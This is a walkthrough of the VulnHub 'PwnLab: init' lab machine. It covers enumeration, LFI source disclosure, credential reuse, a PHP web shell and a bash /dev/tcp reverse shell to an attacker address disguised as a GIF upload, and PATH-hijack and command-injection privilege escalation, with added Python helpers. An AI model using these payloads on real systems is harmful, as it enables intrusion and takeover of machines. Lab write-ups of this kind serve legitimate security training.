VulnHub: PWNLAB: INIT

ratiros01
6 min read · Apr 17, 2021

Initial foothold

1. Network discovery

nmap -sn 10.0.2.27/24

My target is 10.0.2.42.

2. Port scan

nmap -Pn 10.0.2.42
nmap -Pn -p1000- 10.0.2.42

There are four open ports: 80, 111, 3306, and 50251.

3. OS and service scan

nmap -A -p80,111,3306,50251 10.0.2.42

4. Vuln scan

nmap --script vuln -p80,111,3306,50251 10.0.2.42

The vuln scripts list many paths on the HTTP service.

Service Enumeration

• Port 80: Apache httpd 2.4.10 ((Debian))

1. Nikto scan

nikto -h http://10.0.2.42

Nikto discovers more paths on the HTTP service.

2. Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.42/ -x php,txt,html,sh,cgi -q

3. Access the site

Index page

Login page

Upload page

/upload directory

I noticed that the ‘page’ parameter in http://10.0.2.42/?page=login looks like a script name the server includes, so it may be vulnerable to LFI.

• Port 111: rpcbind 2–4 (RPC #100000)

1. Scan

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.0.2.42

No exports are listed, so there is nothing to use here.

  • Port 3306: MySQL 5.5.47–0+deb8u1

I don't have any credentials. I’ll leave it for now.

Exploitation

1. Intercept the request with Burp Suite

http://10.0.2.42/?page=login

2. Test LFI by supplying:

http://10.0.2.42/?page=../../../../../../etc/passwd

Failed: the parameter is treated as a script name with .php appended, so a plain traversal path does not resolve to the file.

Instead, use the php://filter wrapper, which returns the script's source base64-encoded rather than executing it. Starting with config (config.php):

http://10.0.2.42/?page=php://filter/convert.base64-encode/resource=config

Success

Decoding the base64 string gives config.php, which contains the MySQL credentials.

index.php

http://10.0.2.42/?page=php://filter/convert.base64-encode/resource=index

upload.php

http://10.0.2.42/?page=php://filter/convert.base64-encode/resource=upload

The upload function has a filter on what it accepts.

login.php

http://10.0.2.42/?page=php://filter/convert.base64-encode/resource=login

The login query uses bound parameters, so SQL injection is not an option here.

3. Another LFI

At the top of the code there is a cookie called ‘lang’ that is passed straight to include(), which is a second LFI.

In the intercepted request, change the cookie to:

 lang=../../../../../../../etc/passwd

Success. I’ll leave it for a while.

Note all the usernames and save them as users.txt.
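Helpers for the two LFI steps above, as an added example (this is not code from the write-up). The target URL and the traversal depth are the write-up's; the config.php layout, the variable names and the HTML wrapped around the base64 blob are constructed here for illustration, not the VM's real files.

```python
import base64
import re

# Added example, not code from the write-up: helpers for the php://filter
# source disclosure and the `lang` cookie traversal. The config.php layout and
# the HTML around the base64 blob are constructed; the VM's real files are
# not reproduced here.

TARGET = "http://10.0.2.42/"  # from the write-up


def filter_url(page, base=TARGET):
    """?page= value that makes the app's include() read <page>.php through
    PHP's base64 filter instead of executing it. The app appends ".php"
    itself, so `page` is given without the extension."""
    return f"{base}?page=php://filter/convert.base64-encode/resource={page}"


B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_filter_body(body):
    """The filtered source comes back as one long base64 run embedded in the
    surrounding HTML. Take the longest such run and decode it."""
    runs = B64_RUN.findall(body)
    if not runs:
        raise ValueError("no base64 run in response body")
    return base64.b64decode(max(runs, key=len)).decode("utf-8", "replace")


ASSIGN = re.compile(r"""\$(\w+)\s*=\s*(['"])(.*?)\2\s*;""")


def php_string_assignments(src):
    """Pull $name = 'literal'; assignments out of recovered PHP source, which
    is how a config file usually holds DB credentials."""
    return {name: value for name, _quote, value in ASSIGN.findall(src)}


def lang_cookie(path, depth=7):
    """Cookie value for the second LFI: the `lang` cookie is handed to
    include(), so a traversal prefix reaches any readable file. Seven ../
    is what the write-up used for /etc/passwd."""
    return "lang=" + "../" * depth + path.lstrip("/")


# Constructed sample: what a filtered config.php could look like once the
# server has base64-encoded it and wrapped it in the page's HTML. The
# variable names are assumptions; the credential values are the ones the
# write-up later uses against MySQL.
SAMPLE_CONFIG = (
    "<?php\n"
    '$server   = "localhost";\n'
    '$username = "root";\n'
    '$password = "H4u%QJ_H99";\n'
    '$database = "Users";\n'
    "?>\n"
)
SAMPLE_BODY = (
    "<html><body>"
    + base64.b64encode(SAMPLE_CONFIG.encode()).decode()
    + "</body></html>"
)


if __name__ == "__main__":
    print(filter_url("config"))
    recovered = decode_filter_body(SAMPLE_BODY)
    print(recovered)
    print(php_string_assignments(recovered))
    print(lang_cookie("/etc/passwd"))
```

Against the live box, `decode_filter_body` would be fed the response of a GET to `filter_url("config")`; the sample body stands in for that response so the helpers run offline.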

4. Login to MySQL

Using the credentials recovered from config.php:

Login

mysql -h 10.0.2.42 -u root -p'H4u%QJ_H99'

I have to restart the VM to proceed.

use mysql;

Access is denied

Since I already know that there’s ‘Users’ database, I’ll access it.

use Users;
show tables;
select * from users;

There are usernames with base64-encoded passwords.

I can try to write a web shell through MySQL with SELECT ... INTO OUTFILE:

SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE "/var/www/upload/shell.php";
SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE "/var/www/shell.php";

Access is denied for both paths.

I decoded them with CyberChef.

Here’s the decoded list.

5. Login to website

I can upload files.

Prepare a PHP reverse shell file and save it as shell.php:

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.2.27/443 0>&1'");
?>

Upload

Intercept the upload request and send it: the response says the extension is not allowed.

Change shell.php to shell.php.gif

Also failed.

Change to shell.gif

Error 002. The extension check passes now, but the upload also inspects the file content, and a file that is only PHP does not look like an image.

Prepending ‘GIF89a;’ to the file makes it pass that check as a GIF while the PHP after the header is untouched. Succeeded.

6. Access reverse shell

Access http://10.0.2.42/upload. The uploaded shell is listed there with a .gif extension.

Prepare a listener on port 443:

rlwrap nc -lvp 443

Clicking the file does nothing: Apache serves a .gif as a static image, so the PHP inside it is never executed.

Another way to reach the file is through the ‘lang’ cookie LFI: include() executes whatever file it is pointed at, whatever the extension.

The file is located in:

/var/www/html/upload/

Pointing the cookie at the uploaded file with the same traversal as before, the reverse shell connects back. Now I have the shell.

Privilege Escalation

  1. Re-using credential and explore /home

Since I already have some credentials, I can re-use them:

su kane
password: iSv5Ym2GRo
cd /home/kane
ls -la

There's a ‘msgmike’ program.

strings msgmike

It calls ‘cat /home/mike/msg.txt’.

Since the program calls cat by name rather than by its full path (/bin/cat), I can put a directory containing a fake cat first in PATH; when msgmike runs with mike's privileges, the fake cat runs a shell instead.

cd /tmp
echo /bin/sh > cat
chmod 777 cat
export PATH=/tmp:$PATH
cd /home/kane
./msgmike
whoami

Now, I’m ‘mike’.

cd /home/mike
ls -la

There's a ‘msg2root’ program.

strings msg2root

The message is passed into a shell echo command as-is, so I can supply ‘test’ as the message and append ‘&& /bin/bash -p’ to run a shell once echo has finished (-p keeps the elevated effective UID that bash would otherwise drop).

./msg2root
Message for root: test && /bin/bash -p
whoami

Now, I’m root.
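The two mechanics behind this escalation, PATH hijacking of an unqualified cat and command injection into a shell-built echo, reproduced as an added example (not the write-up's code). The stand-ins are plain shell scripts in a temp directory rather than the VM's setuid msgmike and msg2root, nothing runs with elevated privileges, and the injected command is `touch <marker>` in place of `/bin/bash -p` so the result is checkable rather than an interactive shell; all of that is assumption for the demo.

```python
import os
import stat
import subprocess
import tempfile

# Added example, not code from the write-up. Stand-ins are throwaway shell
# scripts, not the VM's setuid binaries; the injected command is `touch` so
# the demo has a checkable result instead of an interactive shell.


def _write_script(path, body):
    with open(path, "w") as f:
        f.write(body)
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)


def msgmike_stand_in(use_full_path):
    """Like msgmike: a program that reaches cat through the shell. Returns
    what it printed when run with an attacker-controlled PATH."""
    with tempfile.TemporaryDirectory() as tmp:
        msg = os.path.join(tmp, "msg.txt")
        with open(msg, "w") as f:
            f.write("real message\n")
        cat = "/bin/cat" if use_full_path else "cat"
        victim = os.path.join(tmp, "msgmike")
        _write_script(victim, f"#!/bin/sh\n{cat} {msg}\n")

        # The attack: a directory holding a fake `cat`, placed first in PATH
        # (the write-up uses /tmp and an `echo /bin/sh > cat` one-liner).
        hijack = os.path.join(tmp, "hijack")
        os.mkdir(hijack)
        _write_script(os.path.join(hijack, "cat"), "#!/bin/sh\necho HIJACKED\n")
        env = dict(os.environ)
        env["PATH"] = hijack + os.pathsep + env.get("PATH", "/usr/bin:/bin")

        out = subprocess.run(["/bin/sh", victim], env=env,
                             capture_output=True, text=True, check=True)
        return out.stdout.strip()


def log_message_vulnerable(message, logfile):
    """msg2root's pattern: the message is spliced into a command string that
    the shell parses, so `&&`, `;`, backticks and friends run commands."""
    subprocess.run(f"/bin/echo {message} >> {logfile}", shell=True, check=False)


def log_message_safe(message, logfile):
    """Same intent without a shell: the message is a single argv element and
    the append is done by the caller, so metacharacters stay literal."""
    with open(logfile, "a") as f:
        subprocess.run(["/bin/echo", message], stdout=f, check=True)


def msg2root_stand_in():
    """Run the write-up's payload shape through both versions. Returns
    (injected command ran via the vulnerable path,
     injected command ran via the safe path,
     what the safe path actually logged)."""
    with tempfile.TemporaryDirectory() as tmp:
        marker = os.path.join(tmp, "marker")
        payload = f"test && touch {marker}"

        log_message_vulnerable(payload, os.path.join(tmp, "messages.txt"))
        vuln_ran = os.path.exists(marker)
        if vuln_ran:
            os.remove(marker)

        safe_log = os.path.join(tmp, "messages_safe.txt")
        log_message_safe(payload, safe_log)
        safe_ran = os.path.exists(marker)
        with open(safe_log) as f:
            logged = f.read().strip()
        return vuln_ran, safe_ran, logged


if __name__ == "__main__":
    print("bare cat:      ", msgmike_stand_in(use_full_path=False))
    print("/bin/cat:      ", msgmike_stand_in(use_full_path=True))
    print("msg2root demo: ", msg2root_stand_in())
```

The fix on the defender's side is the same in both halves: call binaries by absolute path (or reset PATH before the call) in anything that runs with elevated privileges, and never build a shell command string from user input.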
